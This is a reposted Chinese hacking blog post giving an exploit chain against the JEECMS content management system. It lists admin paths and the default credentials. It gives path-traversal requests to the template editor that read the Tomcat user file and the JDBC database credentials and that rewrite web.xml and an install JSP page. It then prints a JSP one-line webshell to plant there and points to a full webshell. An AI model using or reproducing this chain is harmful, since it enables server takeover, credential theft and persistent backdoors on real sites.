JEECMS是基于java技術開發，繼承其強大、穩定、安全、高效、跨平臺等多方面的優點 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技術架構 安全性做得非常變態，當網站安裝完成后就不再允許執行任何目錄下的jsp文件了（web.xml配置了過濾器禁止了很多種動態腳本）。

2.x后臺：
login/Jeecms.do
3.x后臺：
jeeadmin/jeecms/index.do

默認賬戶：admin
默認密碼：password

獲取tomcat密碼：
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

獲取JDBC數據庫賬號密碼：
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties

JEECMS2.x版讀取路徑：
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties

修改web.xml取消對jsp的過濾：
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml

JEECMS2.x版讀取路徑：
admin/core/template/Com_edit.do?relPath=\../../../web.xml

修改install/install_setup.jsp：
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp

JEECMS2.x版讀取路徑：
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp

插入Jsp一句話：
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("

("f"))).write(request.getParameter("t").getBytes());
%>

修改后的一句話目錄
/install/install_setup.jsp

一句話連接成功后的jsp大馬目錄：
/ma.jsp

注：

1：2.X 在后臺可以上傳媒體格式為jsp的文件

2：web.xml修改后需要重啟服務器（自動加載更新的除外）
3：本文由 李聽Hack 原創，轉載請留名。

轉載于:https://blog.51cto.com/8346456/1339072

總結

以上是生活随笔為你收集整理的JEECMS编辑漏洞及随便拿webshell,啊哈哈的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。